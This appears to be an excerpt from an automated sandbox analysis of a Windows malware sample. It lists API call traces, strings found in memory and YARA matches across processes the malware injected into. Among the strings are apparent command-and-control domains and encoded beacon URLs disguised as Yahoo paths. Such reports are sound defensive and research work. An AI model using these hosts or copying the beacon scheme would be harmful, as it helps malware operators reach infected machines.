Source: C:\Users\user\Desktop\2GEg45PlG9.exe | Code function: 1_2_0078E9AC lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, |
Source: C:\Users\user\Desktop\2GEg45PlG9.exe | Code function: 1_2_0079999E lstrcmp,FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, |
Source: C:\Users\user\Desktop\2GEg45PlG9.exe | Code function: 1_2_0079A2FE lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, |
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 44_2_0091999E FindFirstFileW,FindNextFileW,FindClose,FreeLibrary, |
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 44_2_0090E9AC memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose, |
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 44_2_0091A2FE lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, |
Source: 2GEg45PlG9.exe, 00000001.00000003.455384028.00000000040F8000.00000004.00000040.sdmp, powershell.exe, 0000000E.00000003.473205364.000002E0C721C000.00000004.00000040.sdmp, control.exe, 00000015.00000003.542333529.0000019283CFC000.00000004.00000040.sdmp, control.exe, 00000015.00000003.470344123.0000019283CFC000.00000004.00000040.sdmp, control.exe, 00000015.00000003.470416352.0000019283CFC000.00000004.00000040.sdmp, control.exe, 00000015.00000002.553064845.0000019283CFC000.00000004.00000040.sdmp, RuntimeBroker.exe, 0000001D.00000002.844738201.000001B91FF02000.00000004.00000001.sdmp, rundll32.exe, 0000001F.00000002.551762255.0000023D83CEC000.00000004.00000040.sdmp, rundll32.exe, 0000001F.00000003.549603745.0000023D83CEC000.00000004.00000040.sdmp, rundll32.exe, 0000001F.00000003.549734741.0000023D83CEC000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000021.00000002.848361945.00000163C5B02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000023.00000002.841098267.000001EAE4A02000.00000004.00000001.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txt |
Source: 2GEg45PlG9.exe, 00000001.00000003.455384028.00000000040F8000.00000004.00000040.sdmp, powershell.exe, 0000000E.00000003.473205364.000002E0C721C000.00000004.00000040.sdmp, control.exe, 00000015.00000003.542333529.0000019283CFC000.00000004.00000040.sdmp, control.exe, 00000015.00000003.470344123.0000019283CFC000.00000004.00000040.sdmp, control.exe, 00000015.00000003.470416352.0000019283CFC000.00000004.00000040.sdmp, control.exe, 00000015.00000002.553064845.0000019283CFC000.00000004.00000040.sdmp, RuntimeBroker.exe, 0000001D.00000002.844738201.000001B91FF02000.00000004.00000001.sdmp, rundll32.exe, 0000001F.00000002.551762255.0000023D83CEC000.00000004.00000040.sdmp, rundll32.exe, 0000001F.00000003.549603745.0000023D83CEC000.00000004.00000040.sdmp, rundll32.exe, 0000001F.00000003.549734741.0000023D83CEC000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000021.00000002.848361945.00000163C5B02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000023.00000002.841098267.000001EAE4A02000.00000004.00000001.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txtC: |
Source: 2GEg45PlG9.exe, 00000001.00000003.389963914.00000000004F6000.00000004.00000001.sdmp, 2GEg45PlG9.exe, 00000001.00000003.346201365.00000000004F6000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: 2GEg45PlG9.exe, 00000001.00000003.455384028.00000000040F8000.00000004.00000040.sdmp, powershell.exe, 0000000E.00000003.473205364.000002E0C721C000.00000004.00000040.sdmp, control.exe, 00000015.00000003.542333529.0000019283CFC000.00000004.00000040.sdmp, control.exe, 00000015.00000003.470344123.0000019283CFC000.00000004.00000040.sdmp, control.exe, 00000015.00000003.470416352.0000019283CFC000.00000004.00000040.sdmp, control.exe, 00000015.00000002.553064845.0000019283CFC000.00000004.00000040.sdmp, RuntimeBroker.exe, 0000001D.00000002.844738201.000001B91FF02000.00000004.00000001.sdmp, rundll32.exe, 0000001F.00000002.551762255.0000023D83CEC000.00000004.00000040.sdmp, rundll32.exe, 0000001F.00000003.549603745.0000023D83CEC000.00000004.00000040.sdmp, rundll32.exe, 0000001F.00000003.549734741.0000023D83CEC000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000021.00000002.848361945.00000163C5B02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000023.00000002.841098267.000001EAE4A02000.00000004.00000001.sdmp | String found in binary or memory: http://https://file://USER.ID%lu.exe/upd |
Source: RuntimeBroker.exe, 00000021.00000000.605642600.00000163C251A000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000021.00000002.838572516.00000163C251A000.00000004.00000001.sdmp | String found in binary or memory: http://ns.adobe.cmgbbn |
Source: RuntimeBroker.exe, 00000021.00000000.605642600.00000163C251A000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000021.00000002.838572516.00000163C251A000.00000004.00000001.sdmp | String found in binary or memory: http://ns.adobe.uxB |
Source: RuntimeBroker.exe, 00000021.00000000.605642600.00000163C251A000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000021.00000002.838572516.00000163C251A000.00000004.00000001.sdmp | String found in binary or memory: http://ns.adobp/ |
Source: RuntimeBroker.exe, 00000021.00000000.605642600.00000163C251A000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000021.00000002.838572516.00000163C251A000.00000004.00000001.sdmp | String found in binary or memory: http://ns.micro/1 |
Source: powershell.exe, 0000000E.00000002.583661577.000002E0BE381000.00000004.00000001.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 0000000E.00000002.536377289.000002E0AE529000.00000004.00000001.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 0000000E.00000002.535715477.000002E0AE321000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: RuntimeBroker.exe, 00000021.00000000.586908271.00000163C434E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000021.00000000.606052348.00000163C434E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000021.00000002.841542225.00000163C434E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000021.00000000.611672553.00000163C434E000.00000004.00000001.sdmp | String found in binary or memory: http://twitter.com/spotifySSOR_ |
Source: powershell.exe, 0000000E.00000002.536377289.000002E0AE529000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 0000000E.00000002.583661577.000002E0BE381000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 0000000E.00000002.583661577.000002E0BE381000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 0000000E.00000002.583661577.000002E0BE381000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/License |
Source: 2GEg45PlG9.exe, 00000001.00000003.347025160.0000000002B18000.00000004.00000040.sdmp, 2GEg45PlG9.exe, 00000001.00000003.389984019.0000000000522000.00000004.00000001.sdmp, 2GEg45PlG9.exe, 00000001.00000003.347031164.0000000002B1B000.00000004.00000040.sdmp | String found in binary or memory: https://csp.yahoo.com/beacon/csp?src=ats&site=frontpage®ion=US&lang=en-US&device=desktop&yrid=4d9 |
Source: 2GEg45PlG9.exe, 00000001.00000003.347025160.0000000002B18000.00000004.00000040.sdmp, 2GEg45PlG9.exe, 00000001.00000003.399123290.0000000002B18000.00000004.00000040.sdmp, 2GEg45PlG9.exe, 00000001.00000002.517601927.0000000002B18000.00000004.00000040.sdmp, 2GEg45PlG9.exe, 00000001.00000003.393561682.0000000002B18000.00000004.00000040.sdmp, 2GEg45PlG9.exe, 00000001.00000003.515942953.0000000002B18000.00000004.00000040.sdmp, 2GEg45PlG9.exe, 00000001.00000003.397469002.0000000002B18000.00000004.00000040.sdmp | String found in binary or memory: https://doreuneruy.store |
Source: 2GEg45PlG9.exe, 00000001.00000003.389963914.00000000004F6000.00000004.00000001.sdmp | String found in binary or memory: https://doreuneruy.store/ |
Source: 2GEg45PlG9.exe, 00000001.00000002.516883951.0000000000530000.00000004.00000020.sdmp | String found in binary or memory: https://doreuneruy.store/jdraw/3UXHIycRk8M6aa2qOlHTdp/8jPuZVV_2B0Th/06YoiQaE/_2FatRxjXAnjx3AlxRhb2k2 |
Source: 2GEg45PlG9.exe, 00000001.00000003.389963914.00000000004F6000.00000004.00000001.sdmp | String found in binary or memory: https://doreuneruy.store/mE |
Source: 2GEg45PlG9.exe, 00000001.00000003.389963914.00000000004F6000.00000004.00000001.sdmp | String found in binary or memory: https://doreuneruy.store/u |
Source: 2GEg45PlG9.exe, 00000001.00000003.347025160.0000000002B18000.00000004.00000040.sdmp, 2GEg45PlG9.exe, 00000001.00000003.399123290.0000000002B18000.00000004.00000040.sdmp, 2GEg45PlG9.exe, 00000001.00000002.517601927.0000000002B18000.00000004.00000040.sdmp, 2GEg45PlG9.exe, 00000001.00000003.393561682.0000000002B18000.00000004.00000040.sdmp, 2GEg45PlG9.exe, 00000001.00000003.515942953.0000000002B18000.00000004.00000040.sdmp, 2GEg45PlG9.exe, 00000001.00000003.397469002.0000000002B18000.00000004.00000040.sdmp | String found in binary or memory: https://doreuneruy.storehttps://qorunegolu.club |
Source: powershell.exe, 0000000E.00000002.536377289.000002E0AE529000.00000004.00000001.sdmp | String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 0000000E.00000002.583661577.000002E0BE381000.00000004.00000001.sdmp | String found in binary or memory: https://nuget.org/nuget.exe |
Source: 2GEg45PlG9.exe, 00000001.00000003.347025160.0000000002B18000.00000004.00000040.sdmp, 2GEg45PlG9.exe, 00000001.00000003.389984019.0000000000522000.00000004.00000001.sdmp, 2GEg45PlG9.exe, 00000001.00000003.347031164.0000000002B1B000.00000004.00000040.sdmp | String found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml |
Source: 2GEg45PlG9.exe, 00000001.00000003.347025160.0000000002B18000.00000004.00000040.sdmp, 2GEg45PlG9.exe, 00000001.00000003.399123290.0000000002B18000.00000004.00000040.sdmp, 2GEg45PlG9.exe, 00000001.00000002.517601927.0000000002B18000.00000004.00000040.sdmp, 2GEg45PlG9.exe, 00000001.00000003.393561682.0000000002B18000.00000004.00000040.sdmp, 2GEg45PlG9.exe, 00000001.00000003.515942953.0000000002B18000.00000004.00000040.sdmp, 2GEg45PlG9.exe, 00000001.00000003.397469002.0000000002B18000.00000004.00000040.sdmp | String found in binary or memory: https://qorunegolu.club |
Source: 2GEg45PlG9.exe, 00000001.00000003.389963914.00000000004F6000.00000004.00000001.sdmp, 2GEg45PlG9.exe, 00000001.00000003.346201365.00000000004F6000.00000004.00000001.sdmp | String found in binary or memory: https://www.yahoo.com/ |
Source: 2GEg45PlG9.exe, 00000001.00000003.347031164.0000000002B1B000.00000004.00000040.sdmp | String found in binary or memory: https://www.yahoo.com/?err=404&err_url=https%3a%2f%2fwww.yahoo.com%2fjdraw%2fPzj8ZAf1ocor%2fvwsK7U9H |
Source: 2GEg45PlG9.exe, 00000001.00000003.346201365.00000000004F6000.00000004.00000001.sdmp | String found in binary or memory: https://www.yahoo.com/F |
Source: 2GEg45PlG9.exe, 00000001.00000003.389963914.00000000004F6000.00000004.00000001.sdmp | String found in binary or memory: https://www.yahoo.com/M |
Source: 2GEg45PlG9.exe, 00000001.00000003.389963914.00000000004F6000.00000004.00000001.sdmp | String found in binary or memory: https://www.yahoo.com/b |
Source: 2GEg45PlG9.exe, 00000001.00000003.346201365.00000000004F6000.00000004.00000001.sdmp, 2GEg45PlG9.exe, 00000001.00000003.346160000.0000000000521000.00000004.00000001.sdmp | String found in binary or memory: https://www.yahoo.com/jdraw/Pzj8ZAf1ocor/vwsK7U9HF_2/BSjjGESBX8ncCP/rsp24bDI0WxsD9fAtnq85/rAH52N6aYS |
Source: 2GEg45PlG9.exe, 00000001.00000003.389963914.00000000004F6000.00000004.00000001.sdmp, 2GEg45PlG9.exe, 00000001.00000003.346201365.00000000004F6000.00000004.00000001.sdmp, 2GEg45PlG9.exe, 00000001.00000003.389939167.0000000000542000.00000004.00000001.sdmp | String found in binary or memory: *.www.yahoo.com equals www.yahoo.com (Yahoo) |
Source: 2GEg45PlG9.exe, 00000001.00000003.389963914.00000000004F6000.00000004.00000001.sdmp, 2GEg45PlG9.exe, 00000001.00000003.346201365.00000000004F6000.00000004.00000001.sdmp, 2GEg45PlG9.exe, 00000001.00000003.389939167.0000000000542000.00000004.00000001.sdmp | String found in binary or memory: *.www.yahoo.com0 equals www.yahoo.com (Yahoo) |
Source: 2GEg45PlG9.exe, 00000001.00000003.347031164.0000000002B1B000.00000004.00000040.sdmp | String found in binary or memory: <noscript><META http-equiv="refresh" content="0;URL='https://www.yahoo.com/?err=404&err_url=https%3a%2f%2fwww.yahoo.com%2fjdraw%2fPzj8ZAf1ocor%2fvwsK7U9HF_2%2fBSjjGESBX8ncCP%2frsp24bDI0WxsD9fAtnq85%2frAH52N6aYSEnz28y%2fNysMGquW6jE1I3O%2f36A_2F3Qs_2BAgBXT1%2fHGms2KfZf%2fhtng5Y_2F6UNXpqPSc50%2fedmgeyW7_2FUCcpHRMH%2fzBkXUS6KgYXoeCgqOY5mgh%2fnYjhIOr2VHId2%2f5cO9AJQL%2fv1AW.crw'"></noscript> equals www.yahoo.com (Yahoo) |
Source: 2GEg45PlG9.exe, 00000001.00000003.346201365.00000000004F6000.00000004.00000001.sdmp | String found in binary or memory: Location: https://www.yahoo.com/jdraw/Pzj8ZAf1ocor/vwsK7U9HF_2/BSjjGESBX8ncCP/rsp24bDI0WxsD9fAtnq85/rAH52N6aYSEnz28y/NysMGquW6jE1I3O/36A_2F3Qs_2BAgBXT1/HGms2KfZf/htng5Y_2F6UNXpqPSc50/edmgeyW7_2FUCcpHRMH/zBkXUS6KgYXoeCgqOY5mgh/nYjhIOr2VHId2/5cO9AJQL/v1AW.crw equals www.yahoo.com (Yahoo) |
Source: 2GEg45PlG9.exe, 00000001.00000003.346201365.00000000004F6000.00000004.00000001.sdmp | String found in binary or memory: Mwww.yahoo.com/jdraw/Pzj8ZAf1ocor/vwsK7U9HF_2/BSjjGESBX8ncCP/rsp24bDI0WxsD9fAtnq85/rAH52N6aYSEnz28y/NysMGquW6jE1I3O/36A_2F3Qs_2BAgBXT1/HGms2KfZf/htng5Y_2F6UNXpqPSc50/edmgeyW7_2FUCcpHRMH/zBkXUS6KgYXoeCgqOY5mgh/nYjhIOr2VHId2/5cO9AJQL/v1AW.crwrsp24bDI0WxsD9fAtnq85/rAH52N6aYSEnz28y/NysMGquW6jE1I3O/36A_2F3Qs_2BAgBXT1/HGms2KfZf/htng5Y_2F6UNXpqPSc50/edmgeyW7_2FUCcpHRMH/zBkXUS6KgYXoeCgqOY5mgh/nYjhIOr2VHId2/5cO9AJQL/v1AW.crwp equals www.yahoo.com (Yahoo) |
Source: 2GEg45PlG9.exe, 00000001.00000003.389963914.00000000004F6000.00000004.00000001.sdmp, 2GEg45PlG9.exe, 00000001.00000003.346201365.00000000004F6000.00000004.00000001.sdmp | String found in binary or memory: https://www.yahoo.com/ equals www.yahoo.com (Yahoo) |
Source: 2GEg45PlG9.exe, 00000001.00000003.346201365.00000000004F6000.00000004.00000001.sdmp | String found in binary or memory: https://www.yahoo.com/F equals www.yahoo.com (Yahoo) |
Source: 2GEg45PlG9.exe, 00000001.00000003.389963914.00000000004F6000.00000004.00000001.sdmp | String found in binary or memory: https://www.yahoo.com/M equals www.yahoo.com (Yahoo) |
Source: 2GEg45PlG9.exe, 00000001.00000003.389963914.00000000004F6000.00000004.00000001.sdmp | String found in binary or memory: https://www.yahoo.com/b equals www.yahoo.com (Yahoo) |
Source: 2GEg45PlG9.exe, 00000001.00000003.389963914.00000000004F6000.00000004.00000001.sdmp, 2GEg45PlG9.exe, 00000001.00000003.346201365.00000000004F6000.00000004.00000001.sdmp, 2GEg45PlG9.exe, 00000001.00000003.346160000.0000000000521000.00000004.00000001.sdmp | String found in binary or memory: https://www.yahoo.com/jdraw/Pzj8ZAf1ocor/vwsK7U9HF_2/BSjjGESBX8ncCP/rsp24bDI0WxsD9fAtnq85/rAH52N6aYSEnz28y/NysMGquW6jE1I3O/36A_2F3Qs_2BAgBXT1/HGms2KfZf/htng5Y_2F6UNXpqPSc50/edmgeyW7_2FUCcpHRMH/zBkXUS6KgYXoeCgqOY5mgh/nYjhIOr2VHId2/5cO9AJQL/v1AW.crw equals www.yahoo.com (Yahoo) |
Source: 2GEg45PlG9.exe, 00000001.00000003.347031164.0000000002B1B000.00000004.00000040.sdmp | String found in binary or memory: var u='https://www.yahoo.com/?err=404&err_url=https%3a%2f%2fwww.yahoo.com%2fjdraw%2fPzj8ZAf1ocor%2fvwsK7U9HF_2%2fBSjjGESBX8ncCP%2frsp24bDI0WxsD9fAtnq85%2frAH52N6aYSEnz28y%2fNysMGquW6jE1I3O%2f36A_2F3Qs_2BAgBXT1%2fHGms2KfZf%2fhtng5Y_2F6UNXpqPSc50%2fedmgeyW7_2FUCcpHRMH%2fzBkXUS6KgYXoeCgqOY5mgh%2fnYjhIOr2VHId2%2f5cO9AJQL%2fv1AW.crw'; equals www.yahoo.com (Yahoo) |
Source: 2GEg45PlG9.exe, 00000001.00000002.517885916.000000000342A000.00000004.00000010.sdmp, 2GEg45PlG9.exe, 00000001.00000003.389963914.00000000004F6000.00000004.00000001.sdmp, 2GEg45PlG9.exe, 00000001.00000002.516883951.0000000000530000.00000004.00000020.sdmp, 2GEg45PlG9.exe, 00000001.00000003.346201365.00000000004F6000.00000004.00000001.sdmp | String found in binary or memory: www.yahoo.com equals www.yahoo.com (Yahoo) |
Source: 2GEg45PlG9.exe, 00000001.00000003.389963914.00000000004F6000.00000004.00000001.sdmp | String found in binary or memory: www.yahoo.com(( equals www.yahoo.com (Yahoo) |
Source: 2GEg45PlG9.exe, 00000001.00000003.346201365.00000000004F6000.00000004.00000001.sdmp | String found in binary or memory: www.yahoo.com/jdraw/Pzj8ZAf1ocor/vwsK7U9HF_2/BSjjGESBX8ncCP/rsp24bDI0WxsD9fAtnq85/rAH52N6aYSEnz28y/NysMGquW6jE1I3O/36A_2F3Qs_2BAgBXT1/HGms2KfZf/htng5Y_2F6UNXpqPSc50/edmgeyW7_2FUCcpHRMH/zBkXUS6KgYXoeCgqOY5mgh/nYjhIOr2VHId2/5cO9AJQL/v1AW.crw equals www.yahoo.com (Yahoo) |
Source: 2GEg45PlG9.exe, 00000001.00000003.389963914.00000000004F6000.00000004.00000001.sdmp, 2GEg45PlG9.exe, 00000001.00000003.346201365.00000000004F6000.00000004.00000001.sdmp | String found in binary or memory: www.yahoo.com2 equals www.yahoo.com (Yahoo) |
Source: 2GEg45PlG9.exe, 00000001.00000003.389963914.00000000004F6000.00000004.00000001.sdmp | String found in binary or memory: www.yahoo.com:$ equals www.yahoo.com (Yahoo) |
Source: 2GEg45PlG9.exe, 00000001.00000003.389963914.00000000004F6000.00000004.00000001.sdmp | String found in binary or memory: www.yahoo.comM) equals www.yahoo.com (Yahoo) |
Source: 2GEg45PlG9.exe, 00000001.00000003.346201365.00000000004F6000.00000004.00000001.sdmp | String found in binary or memory: www.yahoo.comP equals www.yahoo.com (Yahoo) |
Source: 2GEg45PlG9.exe, 00000001.00000003.346201365.00000000004F6000.00000004.00000001.sdmp | String found in binary or memory: www.yahoo.comP$M equals www.yahoo.com (Yahoo) |
Source: 2GEg45PlG9.exe, 00000001.00000003.346201365.00000000004F6000.00000004.00000001.sdmp | String found in binary or memory: www.yahoo.comQ equals www.yahoo.com (Yahoo) |
Source: 2GEg45PlG9.exe, 00000001.00000003.346201365.00000000004F6000.00000004.00000001.sdmp | String found in binary or memory: www.yahoo.comoo.comQ equals www.yahoo.com (Yahoo) |
Source: Yara match | File source: 0000000E.00000003.473205364.000002E0C721C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.347025160.0000000002B18000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001F.00000002.551762255.0000023D83CEC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000023.00000002.841098267.000001EAE4A02000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.399143772.000000000291C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.346977655.0000000002B18000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001F.00000003.549603745.0000023D83CEC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.702102398.0000000003298000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.702289385.0000000003298000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.702177373.0000000003298000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.346937674.0000000002B18000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.542333529.0000019283CFC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.702063313.0000000003298000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.702232762.0000000003298000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.455384028.00000000040F8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.346992994.0000000002B18000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.470344123.0000019283CFC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.346913060.0000000002B18000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.346959210.0000000002B18000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.393561682.0000000002B18000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.470416352.0000019283CFC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000021.00000002.848361945.00000163C5B02000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001D.00000002.844738201.000001B91FF02000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.702016813.0000000003298000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.397469002.0000000002B18000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.702206900.0000000003298000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000002.703676134.0000000003298000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.701957024.0000000003298000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000024.00000002.838458423.0000027741E02000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.347006812.0000000002B18000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.347017616.0000000002B18000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000002.553064845.0000019283CFC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.702145483.0000000003298000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001F.00000003.549734741.0000023D83CEC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: 2GEg45PlG9.exe PID: 6540, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 4768, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: control.exe PID: 6576, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4084, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6500, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4176, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4440, type: MEMORYSTR |
Source: Yara match | File source: 1.3.2GEg45PlG9.exe.25594a0.11.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.3.2GEg45PlG9.exe.2a1a4a0.1.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.3.2GEg45PlG9.exe.2ac4ef0.3.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.3.2GEg45PlG9.exe.2a994a0.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.3.2GEg45PlG9.exe.2a1a4a0.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.2.2GEg45PlG9.exe.20d0000.2.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.3.2GEg45PlG9.exe.25594a0.11.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.3.2GEg45PlG9.exe.2ac4ef0.3.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 00000023.00000000.640272876.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000024.00000000.665585940.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000021.00000000.607122164.00000163C5160000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.397282239.0000000002A99000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000002.517379497.0000000002720000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000023.00000000.645879141.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000023.00000000.651725640.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000000.465481306.0000000000BC0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001D.00000000.566373017.000001B920020000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000000.469185979.0000000000BC0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001F.00000000.547994492.0000023D83620000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001D.00000000.560669492.000001B920020000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000000E.00000002.585352410.000002E0BE597000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.516035040.0000000002559000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000021.00000000.613095849.00000163C5160000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000024.00000000.663821435.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001F.00000000.546791184.0000023D83620000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000021.00000000.618879777.00000163C5160000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001D.00000000.555920972.000001B920020000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001F.00000000.544941434.0000023D83620000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.397218720.0000000002A1A000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000024.00000000.661999238.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000000.466675811.0000000000BC0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000000E.00000003.473205364.000002E0C721C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.347025160.0000000002B18000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001F.00000002.551762255.0000023D83CEC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000023.00000002.841098267.000001EAE4A02000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.399143772.000000000291C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.346977655.0000000002B18000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001F.00000003.549603745.0000023D83CEC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.702102398.0000000003298000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.702289385.0000000003298000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.702177373.0000000003298000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.346937674.0000000002B18000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.542333529.0000019283CFC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.702063313.0000000003298000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.702232762.0000000003298000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.455384028.00000000040F8000.00000004.00000040.sdmp, type: MEMORY |
